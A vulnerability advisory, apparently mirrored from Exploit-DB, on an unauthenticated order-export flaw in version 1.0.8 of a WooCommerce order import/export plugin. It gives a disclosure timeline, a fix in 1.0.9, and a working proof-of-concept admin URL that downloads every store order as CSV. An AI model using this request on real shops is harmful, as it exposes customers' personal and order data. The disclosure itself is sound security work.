WordPress Plugin Order Export Import for WooCommerce

vendor:

by:

contact ([a]) david-peltier ([d]) fr

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: WordPress Plugin Order Export Import for WooCommerce

Affected Version From: 1.0.8

Affected Version To: 1.0.8

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

WordPress Plugin Order Export Import for WooCommerce

WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store. This attacks allows an attacker to export all order without being authenticated.

Mitigation:

Upgrade to version 1.0.9 of the plugin

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Order Export Import for WooCommerce
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
# Version: 1.0.8
# Date: 19th 2016
# Exploit Author: contact ([a]) david-peltier ([d]) fr
# Vendor Homepage: xadapter.com
# Version: 1.0.8
# Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016


### SUMMARY

WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
This attacks allows an attacker to export all order without being authenticated

### POC

http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
A .CSV with all orders will be downloaded

### FIX

The vendor fix this issue in 1.0.9